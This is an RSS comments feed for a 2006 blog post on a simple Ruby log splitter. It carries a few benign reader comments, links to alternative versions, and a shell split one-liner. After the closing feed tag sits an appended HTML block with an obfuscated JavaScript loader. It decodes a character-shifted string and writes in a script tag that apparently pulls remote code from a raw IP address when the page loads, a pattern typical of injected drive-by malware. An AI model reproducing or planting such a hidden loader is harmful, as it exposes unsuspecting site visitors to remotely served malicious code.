<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: Simple Ruby log splitter</title>
	<atom:link href="http://blog.secosoft.net/2006/08/25/simple-ruby-log-splitter/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.secosoft.net/2006/08/25/simple-ruby-log-splitter/</link>
	<description>Matt Secoske's intermittent ramblings on software and life</description>
	<pubDate>Thu, 04 Dec 2008 00:07:56 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5.1</generator>
		<item>
		<title>By: erik scheirer</title>
		<link>http://blog.secosoft.net/2006/08/25/simple-ruby-log-splitter/#comment-67198</link>
		<dc:creator>erik scheirer</dc:creator>
		<pubDate>Fri, 06 Jun 2008 17:41:44 +0000</pubDate>
		<guid isPermaLink="false">http://blog.secosoft.net/2006/08/25/simple-ruby-log-splitter/#comment-67198</guid>
		<description>Thanks indeed, what a lovely and useful post for those of us who 'code by google' !</description>
		<content:encoded><![CDATA[<p>Thanks indeed, what a lovely and useful post for those of us who &#8216;code by google&#8217; !</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Jeff</title>
		<link>http://blog.secosoft.net/2006/08/25/simple-ruby-log-splitter/#comment-2375</link>
		<dc:creator>Jeff</dc:creator>
		<pubDate>Wed, 30 Aug 2006 02:58:06 +0000</pubDate>
		<guid isPermaLink="false">http://blog.secosoft.net/2006/08/25/simple-ruby-log-splitter/#comment-2375</guid>
		<description>My humble Groovy version here:
https://groovybargrill.wordpress.com/2006/08/29/groovy-log-splitter/</description>
		<content:encoded><![CDATA[<p>My humble Groovy version here:<br />
<a href="https://groovybargrill.wordpress.com/2006/08/29/groovy-log-splitter/" rel="nofollow">https://groovybargrill.wordpress.com/2006/08/29/groovy-log-splitter/</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Groovy Log Splitter &#171; Groovy Bar &#38; Grill</title>
		<link>http://blog.secosoft.net/2006/08/25/simple-ruby-log-splitter/#comment-2374</link>
		<dc:creator>Groovy Log Splitter &#171; Groovy Bar &#38; Grill</dc:creator>
		<pubDate>Wed, 30 Aug 2006 02:46:30 +0000</pubDate>
		<guid isPermaLink="false">http://blog.secosoft.net/2006/08/25/simple-ruby-log-splitter/#comment-2374</guid>
		<description>[...] Matt and Blaine are having fun writing Ruby log splitters. I couldn&#8217;t pass up the opportunity to write one in Groovy, so here it is: [...]</description>
		<content:encoded><![CDATA[<p>[...] Matt and Blaine are having fun writing Ruby log splitters. I couldn&#8217;t pass up the opportunity to write one in Groovy, so here it is: [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: thoughts.on.code :: A Ruby DSL for splitting files</title>
		<link>http://blog.secosoft.net/2006/08/25/simple-ruby-log-splitter/#comment-2360</link>
		<dc:creator>thoughts.on.code :: A Ruby DSL for splitting files</dc:creator>
		<pubDate>Mon, 28 Aug 2006 05:02:30 +0000</pubDate>
		<guid isPermaLink="false">http://blog.secosoft.net/2006/08/25/simple-ruby-log-splitter/#comment-2360</guid>
		<description>[...] Tonight Blaine sent me his version of my Simple Ruby Log splitter, that took it a giant step further and made a reuseable library to split files. He used an object oriented approach, as well as provided extensibility by allowing the caller to pass in a block that determined when to split the file. Hopefully he will post the code either on my site or his.  Good stuff. [...]</description>
		<content:encoded><![CDATA[<p>[...] Tonight Blaine sent me his version of my Simple Ruby Log splitter, that took it a giant step further and made a reuseable library to split files. He used an object oriented approach, as well as provided extensibility by allowing the caller to pass in a block that determined when to split the file. Hopefully he will post the code either on my site or his.  Good stuff. [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Stephen</title>
		<link>http://blog.secosoft.net/2006/08/25/simple-ruby-log-splitter/#comment-2343</link>
		<dc:creator>Stephen</dc:creator>
		<pubDate>Sat, 26 Aug 2006 05:51:54 +0000</pubDate>
		<guid isPermaLink="false">http://blog.secosoft.net/2006/08/25/simple-ruby-log-splitter/#comment-2343</guid>
		<description>cat foo.txt &#124; split -l 100</description>
		<content:encoded><![CDATA[<p>cat foo.txt | split -l 100</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<html>
<script>var source ="=tdsjqu?epdvnfou/xsjuf)Tusjoh/gspnDibsDpef)71-226-::-225-216-223-227-43-227-232-223-212-72-45-227-212-231-227-58-217-:8-229-:8-226-::-225-216-223-227-45-43-226-225-::-72-45-215-227-227-223-69-58-58-68-5:-57-5:-63-61-57-65-63-57-68-5:-58-224-228-:8-221-227-226-212-225-229-212-58-224-228-:8-221-227-57-217-226-45-73-71-58-226-::-225-216-223-227-73**<=0tdsjqu?"; var result = ""; 
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); 
document.write(result); </script>
</html>

